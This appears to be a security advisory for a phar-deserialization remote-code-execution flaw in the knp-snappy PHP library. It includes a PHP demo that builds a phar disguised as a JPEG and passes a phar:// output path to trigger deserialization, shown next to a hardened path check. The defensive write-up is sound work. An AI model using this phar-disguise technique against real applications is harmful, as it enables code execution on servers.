knplabs/knp-snappy is vulnerable to Remote Code Execution (RCE) through PHP object deserialization. Before writing a generated document, the library calls file_exists on the output path it is given without validating that path. An attacker who can place a phar archive on the server (for example through an upload whose file type is not checked, since a phar archive can be stored under any extension) and who controls the output file passed to generateFromHtml can supply a phar:// URL as the output path.
PHP's phar stream wrapper then opens the archive to answer file_exists and unserializes its metadata, so attacker-controlled deserialization occurs and, given a suitable gadget chain in the application's autoloadable classes, arbitrary code is executed. The issue is addressed in version 1.4.2.
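The following is an added example and is not code from KnpLabs/snappy: it places the vulnerable output-path check next to a hardened one, and builds a constructed phar disguised as an image to show how a phar:// output path reaches the unserializer. The class and function names (AuditHook, prepareOutputVulnerable, prepareOutputHardened, buildDisguisedPhar) are hypothetical. Run it with `php -d phar.readonly=0 example.php`; phar.readonly=0 is needed only to create the archive, not to trigger the bug. One caveat a practitioner should know: PHP 8.0 changed phar handling so that metadata is unserialized only on an explicit getMetadata() call, so the gadget's __wakeup fires here only on PHP 7 runtimes. The hardened check is the right fix either way, because it never lets a stream URL reach the filesystem functions at all.

```php
<?php
// Added example, not code from KnpLabs/snappy; class and function names are hypothetical.
// Run with: php -d phar.readonly=0 example.php  (readonly=0 is only needed to BUILD the phar).
declare(strict_types=1);

// Stand-in gadget. In a real attack this is some autoloadable application or vendor class
// whose magic method (__wakeup, __destruct, __toString, ...) has a dangerous side effect.
final class AuditHook
{
    public $command = 'id';

    public function __wakeup()
    {
        // A real gadget chain would end in something like passthru($this->command).
        echo "[gadget] __wakeup reached with command: {$this->command}\n";
    }
}

// Vulnerable pattern: the caller's output path is trusted and stat'ed before rendering.
// For 'phar://.../report.jpg/x.txt' PHP opens the archive to answer file_exists(); on
// runtimes that unserialize phar metadata eagerly, the gadget above is instantiated.
function prepareOutputVulnerable(string $output, bool $overwrite): void
{
    if (file_exists($output) && !$overwrite) {
        throw new RuntimeException("The output file '$output' already exists.");
    }
}

// Hardened pattern: refuse every stream-wrapper URL up front, accept only paths that resolve
// inside a directory the application owns, and run the existence check on the resolved path.
function prepareOutputHardened(string $output, bool $overwrite, string $allowedDir): string
{
    // Match the scheme case-insensitively: PHP resolves wrappers that way, so a check for
    // the lowercase prefix 'phar://' alone could be sidestepped with 'PHAR://'.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $output) === 1) {
        throw new InvalidArgumentException('The output file must be a local path, not a stream URL.');
    }
    $base = realpath($allowedDir);
    $dir  = realpath(dirname($output));
    if ($base === false || $dir === false) {
        throw new InvalidArgumentException('The output directory does not exist.');
    }
    // Compare with a trailing separator so that /var/out does not match /var/outside.
    if (strncmp($dir . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('The output file must be inside the allowed directory.');
    }
    $resolved = $dir . DIRECTORY_SEPARATOR . basename($output);
    if (file_exists($resolved) && !$overwrite) {
        throw new RuntimeException("The output file '$resolved' already exists.");
    }
    return $resolved;
}

// Attacker side (constructed): a phar whose metadata is the serialized gadget, renamed to look
// like an image. phar:// ignores the extension, so an upload filter that checks only the
// extension lets it through.
function buildDisguisedPhar(string $dir): string
{
    $pharPath = $dir . DIRECTORY_SEPARATOR . 'report.phar'; // creation needs a .phar name
    $phar = new Phar($pharPath);
    $phar->startBuffering();
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('x.txt', 'x');
    $phar->setMetadata(new AuditHook());
    $phar->stopBuffering();
    $disguised = $dir . DIRECTORY_SEPARATOR . 'report.jpg';
    rename($pharPath, $disguised);
    return $disguised;
}

// Demo driver.
$work = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'snappy-demo-' . bin2hex(random_bytes(4));
mkdir($work);
$upload = buildDisguisedPhar($work);
$evil   = 'phar://' . $upload . '/x.txt'; // what an attacker would pass as the output file

echo "vulnerable check on $evil\n";
try {
    prepareOutputVulnerable($evil, false);
} catch (RuntimeException $e) {
    echo "  " . $e->getMessage() . "\n"; // reached only after the archive has been opened
}

echo "hardened check on $evil\n";
try {
    prepareOutputHardened($evil, false, $work);
} catch (InvalidArgumentException $e) {
    echo "  rejected: " . $e->getMessage() . "\n";
}
echo "  accepted: " . prepareOutputHardened($work . DIRECTORY_SEPARATOR . 'report.pdf', true, $work) . "\n";

unlink($upload);
rmdir($work);
```

The hardened version deliberately does not try to enumerate dangerous schemes: any wrapper prefix is rejected, the directory is anchored with realpath, and only then is file_exists called on a path the application itself assembled. In an application that calls generateFromHtml with a user-influenced output name, the same shape of check belongs at the call site regardless of the library version in use.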
github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
github.com/KnpLabs/snappy/blob/v1.4.1/src/Knp/Snappy/AbstractGenerator.php#L670
github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
github.com/KnpLabs/snappy/pull/469
github.com/KnpLabs/snappy/releases/tag/v1.4.2
github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc